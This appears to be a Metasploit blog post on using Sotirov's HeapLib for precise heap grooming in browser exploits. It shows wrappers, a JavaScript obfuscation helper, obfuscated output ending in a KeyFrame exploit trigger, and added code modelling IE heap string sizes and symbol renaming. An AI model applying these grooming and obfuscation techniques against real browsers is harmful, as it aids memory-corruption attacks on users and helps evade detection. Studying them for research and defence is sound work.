Last updated at Fri, 12 Jan 2024 01:22:30 GMT

If you were able to attend Black Hat Europe this year, you had the opportunity to catch Alexander Sotirov's talk on Heap Feng Shui. The talk described ways to use JavaScript in browsers to control heap layout with surgical precision, which has obvious benefits when exploiting heap-related vulnerabilities in browsers.  At present, many browser-based exploits blindly spray payloads and other structures across the heap in ways that do not guarantee success.  To improve this situation, Alex introduced a JavaScript library called HeapLib that provides more granular control of the heap.

Given the usefulness of this library, we've taken the HeapLib JavaScript and written some Metasploit wrappers for interacting with it.  Browser-based exploits written for Metasploit 3 may now take advantage of the features offered by HeapLib.  It's pretty easy to use:


js = heaplib(
  "// js code that uses heaplib goes here\n" +
  "var xyz;\n" +
  "var abc;\n" +
  "...")

send_response(cli, "<script>#{js}</script>")

We've also included some generic code for doing very basic JavaScript obfuscation:


js = obfuscate_js(js,
  'Symbols' =>
     {
         'Variables' => [ 'xyz', 'abc' ]
     })

The JavaScript obfuscation currently amounts to a global substitution of variable, method, class, and namespace names.  This is pretty basic, and it will most definitely be extended in the future.  If all goes well, these improvements will automatically apply to browser-based exploits that use obfuscate_js.  The obfuscation is also applied to the HeapLib code itself.  If you pull up a page that uses it, you'll see something like:


function kgbItQgjwkTsYnvA() {
}
kgbItQgjwkTsYnvA.XK = function(maxAlloc, XPcAqRwEPAZhnqNytABase) {
    this.maxAlloc = (maxAlloc ? maxAlloc : 65535);
    this.XPcAqRwEPAZhnqNytABase = (XPcAqRwEPAZhnqNytABase ? XPcAqRwEPAZhnqNytABase : 0x150000);
    this.NEaCrNWavzlCx = "AAAA";
    while (4 + this.NEaCrNWavzlCx.length*2 + 2 < this.maxAlloc) {
        this.NEaCrNWavzlCx += this.NEaCrNWavzlCx;
...
XPcAqRwEPAZhnqNytA.pzMvSBZ();
for (var i = 0; i < 100; i++)
  XPcAqRwEPAZhnqNytA.ebGXqe(MNaLfxJWihIGQAqPSokXf)
XPcAqRwEPAZhnqNytA.bNYYOglF(MNaLfxJWihIGQAqPSokXf);
for (var i = 0; i < 100; i++)
  XPcAqRwEPAZhnqNytA.ebGXqe(0x2010)
XPcAqRwEPAZhnqNytA.fuuakTBEnTmfWlFMio(ZCPd, 2);
nBnqLM.KeyFrame(0x40000801, new Array(1), new Array(1));
delete XPcAqRwEPAZhnqNytA;
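The identifier `XPcAqRwEPAZhnqNytABase` in the listing above shows the cost of a purely textual substitution: the symbol `heap` was renamed inside `heapBase` as well, because nothing told the substitution where one identifier ends. The following is an added example, not Metasploit's `obfuscate_js` (which is Ruby), that implements the same symbol-substitution idea in JavaScript and contrasts the naive form with a whole-identifier form. The sample source and the fixed name mapping are constructed for the demonstration; `buildSymbolMap` is what a real run would use to pick the random names.

```javascript
// Added example: symbol-renaming obfuscation of the kind the post describes,
// written in JavaScript for a self-contained demo. Metasploit's obfuscate_js
// is Ruby and is not reproduced here.

// Constructed sample modelled on the HeapLib usage in the post; not the real
// library source.
const SAMPLE_JS = [
  "function heapLib() {}",
  "heapLib.ie = function(maxAlloc, heapBase) {",
  "  this.heapBase = (heapBase ? heapBase : 0x150000);",
  "};",
  "var heap = new heapLib.ie(0x20000);",
  "heap.gc();",
].join("\n");

// Fixed mapping so the output is reproducible; buildSymbolMap() below is what
// a real run would use, producing names like those in the listing.
const FIXED_MAP = new Map([
  ["heapLib", "kgbItQgjwkTsYnvA"],
  ["heap", "XPcAqRwEPAZhnqNytA"],
]);

const ID_FIRST = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
const ID_REST = ID_FIRST + "0123456789";

// Random identifier that is valid JavaScript and not already in use. The
// names only need to differ between servings, so Math.random is adequate.
function randomIdentifier(taken, minLen = 6, maxLen = 20) {
  for (;;) {
    const len = minLen + Math.floor(Math.random() * (maxLen - minLen + 1));
    let name = ID_FIRST[Math.floor(Math.random() * ID_FIRST.length)];
    while (name.length < len) {
      name += ID_REST[Math.floor(Math.random() * ID_REST.length)];
    }
    if (!taken.has(name)) {
      taken.add(name);
      return name;
    }
  }
}

// Consistent symbol -> replacement map. The original names are reserved so a
// replacement can never collide with a symbol still waiting to be renamed.
function buildSymbolMap(symbols) {
  const taken = new Set(symbols);
  const map = new Map();
  for (const sym of symbols) map.set(sym, randomIdentifier(taken));
  return map;
}

function escapeRegExp(s) {
  return s.replace(/[.*+?^${}()|[\]\\]/g, "\\$&");
}

// One alternation, longest symbol first, so "heapLib" is matched before
// "heap" and a single pass never re-substitutes its own output.
function symbolAlternation(map) {
  return [...map.keys()]
    .sort((a, b) => b.length - a.length)
    .map(escapeRegExp)
    .join("|");
}

// Naive global substitution, as the post describes: every textual occurrence
// is replaced, including "heap" inside "heapBase". This is the behaviour
// behind the XPcAqRwEPAZhnqNytABase identifier in the listing.
function obfuscateNaive(js, map) {
  const re = new RegExp("(" + symbolAlternation(map) + ")", "g");
  return js.replace(re, (m) => map.get(m));
}

// Whole-identifier substitution: \b confines the match to complete names, so
// heapBase survives when only heap is listed. Occurrences inside string
// literals and comments are still rewritten; a tokenizer would be needed to
// avoid that.
function obfuscateWholeWord(js, map) {
  const re = new RegExp("\\b(" + symbolAlternation(map) + ")\\b", "g");
  return js.replace(re, (m) => map.get(m));
}
```

The naive variant renames consistently, so the script still runs, but a reviewer of the served page can recover the original symbol list from artifacts like a random prefix glued onto `Base`. The whole-word variant removes that artifact, but still rewrites matching text inside string literals and comments, so any symbol that is also used as a string (for example a property looked up by name) must be left off the list.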

To give a real example of using HeapLib in Metasploit, we've ported Alex's KeyFrame exploit.  Comparing the two versions shows that the amount of code needed to use HeapLib from Metasploit is minimal.  The JavaScript is taken verbatim from Alex's exploit (with the exception of comments and debug messages).
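The padding loop in the obfuscated listing and the `alloc(0x2010)` calls that follow it rest on a model of how IE sizes the heap block behind a JavaScript string: a 4-byte length prefix, two bytes per UTF-16 character, and a 2-byte terminator (the `4 + length*2 + 2` expression). The following is an added example, not HeapLib or Metasploit code, that works through that arithmetic: building the padding string, turning a requested block size into an exact character count, and padding a payload string so it can be allocated directly. The multiple-of-16 rule it enforces is the check that HeapLib's `alloc` applies to requested sizes, from my reading of the library; the page itself does not show it.

```javascript
// Added example: a model of the string-size arithmetic HeapLib's IE back end
// relies on. Not HeapLib or Metasploit code.

// Bytes IE allocates on the heap for a JavaScript string: a 4-byte length
// prefix, UTF-16 characters, and a 2-byte NUL terminator. This is the
// expression in the padding loop of the obfuscated listing.
function ieStringAllocSize(str) {
  return 4 + str.length * 2 + 2;
}

// Build the padding string the way the listing does: start at "AAAA" and keep
// doubling until a single allocation of it would reach maxAlloc.
function buildPadding(maxAlloc = 65535) {
  let pad = "AAAA";
  while (ieStringAllocSize(pad) < maxAlloc) {
    pad += pad;
  }
  return pad;
}

// Characters needed so the string's heap block is exactly `size` bytes.
// Assumption (from HeapLib's alloc, not shown on this page): requested sizes
// must be multiples of 16. Since size = 2*len + 6, any multiple of 16 gives
// an integer length; an odd or misaligned size cannot be hit exactly.
function charsForAllocSize(size) {
  if (!Number.isInteger(size) || size <= 6 || size % 16 !== 0) {
    throw new Error("allocation size " + size + " must be a positive multiple of 16");
  }
  return (size - 6) / 2;
}

// Carve a block of exactly `size` bytes out of the padding string, as a
// numeric alloc(n) does; the caller keeps a reference so it stays allocated.
function allocString(padding, size) {
  const n = charsForAllocSize(size);
  if (n > padding.length) {
    throw new Error("requested size 0x" + size.toString(16) + " exceeds padding capacity");
  }
  return padding.substr(0, n);
}

// Payload strings passed to alloc(str) directly (like the shellcode in the
// KeyFrame port) must also land on a 16-byte boundary. Append filler chars
// after the payload until ieStringAllocSize(str) % 16 == 0; each char adds
// two bytes and the size is always even, so at most 7 chars are needed.
function padStringToGranularity(str, filler = "A") {
  let out = str;
  while (ieStringAllocSize(out) % 16 !== 0) {
    out += filler;
  }
  return out;
}
```

With the default `maxAlloc` of 65535 the padding grows to 32768 characters (a 65542-byte block), which is why a request such as `alloc(0x2010)` can be served as a 4101-character substring, while a size that is not a multiple of 16 is rejected rather than silently rounded: the whole point of the library is that the block size is known exactly, which a blind spray never gives you.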